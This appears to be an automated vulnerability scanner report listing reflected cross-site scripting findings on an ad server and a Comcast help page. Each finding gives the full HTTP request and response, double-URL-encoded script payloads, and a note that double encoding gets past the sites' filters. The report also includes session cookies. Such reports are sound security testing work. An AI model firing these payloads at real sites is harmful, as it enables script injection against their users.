Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357f090d"><script>alert(1)</script>e24cabfa7af/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6 was submitted in the REST URL parameter 2. This input was echoed as 7e78a";alert(1)//79b3c23bea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a";alert(1)//79b3c23bea6/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9 was submitted in the REST URL parameter 3. This input was echoed as 481cf";alert(1)//b8c97658fa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf";alert(1)//b8c97658fa9/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140 was submitted in the REST URL parameter 3. This input was echoed as f9245"><script>alert(1)</script>d30d10f1140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245"><script>alert(1)</script>d30d10f1140/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b792%2522%253balert%25281%2529%252f%252fba89bde7c7b was submitted in the REST URL parameter 2. This input was echoed as 4b792";alert(1)//ba89bde7c7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792%2522%253balert%25281%2529%252f%252fba89bde7c7b/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792";alert(1)//ba89bde7c7b/561.0.iframe.120x30/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0 was submitted in the REST URL parameter 2. This input was echoed as 601d4"><script>alert(1)</script>9e988e2cfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357601d4"><script>alert(1)</script>9e988e2cfa0/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4831c%2522%253balert%25281%2529%252f%252f90c3c0b2505 was submitted in the REST URL parameter 3. This input was echoed as 4831c";alert(1)//90c3c0b2505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c%2522%253balert%25281%2529%252f%252f90c3c0b2505/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c";alert(1)//90c3c0b2505/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66 was submitted in the REST URL parameter 3. This input was echoed as 81ecb"><script>alert(1)</script>80e4aff9d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb"><script>alert(1)</script>80e4aff9d66/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774e0%2522%253balert%25281%2529%252f%252fc797c1e1737 was submitted in the REST URL parameter 2. This input was echoed as 774e0";alert(1)//c797c1e1737 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0%2522%253balert%25281%2529%252f%252fc797c1e1737/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0";alert(1)//c797c1e1737/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a was submitted in the REST URL parameter 2. This input was echoed as 4ecbc"><script>alert(1)</script>8c82208ba9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc"><script>alert(1)</script>8c82208ba9a/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34 was submitted in the REST URL parameter 3. This input was echoed as dff08"><script>alert(1)</script>c72cac2bc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08"><script>alert(1)</script>c72cac2bc34/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27 was submitted in the REST URL parameter 3. This input was echoed as fcfe0";alert(1)//522001d1e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0";alert(1)//522001d1e27/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48cbb'-alert(1)-'e073ca99f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1 HTTP/1.1
Host: customer.comcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":3,"lc":{"d0":{"v":3,"s":true}},"sd":0}; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; __utmz=24577576.1292781826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ServerID=1035; fsr.a=1292781826322; mbox=PC#1292775334802-298696.20#1293991427|session#1292780810234-197287#1292783687|check#true#1292781887; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783625663%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahelp%2520index%253A%2520help%2520main%7C1292783625725%3B; bn_u=6923335571706691164; 